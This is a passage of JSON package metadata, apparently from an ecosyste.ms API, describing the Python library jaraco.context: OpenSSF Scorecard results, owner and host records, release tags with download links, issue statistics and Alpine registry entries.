https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.573Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":29.20053862650242,"forks_count":29.145678519774577,"docker_downloads_count":null,"average":14.58655428656925},"purl":"pkg:apk/alpine/py3-jaraco.context-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.18","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context-pyc/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context-pyc/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2146,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2023-05-23T07:14:13.092Z","updated_at":"2023-05-23T07:14:13.092Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.18","url":"https://pkgs.alpinelinux.org/packages?branch=v3.18","ecosystem":"alpine","default":false,"packages_count":20068,"maintainers_count":367,"namespaces_count":2,"keywords_count":3639,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1238},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-05-22T10:43:30.622Z","updated_at":"2026-08-22T05:06:15.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/namespaces"}},{"id":6049362,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":9,"first_release_published_at":"2023-01-20T09:04:17.000Z","latest_release_published_at":"2026-04-09T14:20:16.000Z","latest_release_number":"6.1.2-r0","last_synced_at":"2026-04-09T14:31:15.892Z","created_at":"2023-01-31T18:17:31.852Z","updated_at":"2026-08-06T19:26:18.586Z","registry_url":"https://pkgs.alpinelinux.org/package/edge/community/x86_64/py3-jaraco.context","install_command":"apk add 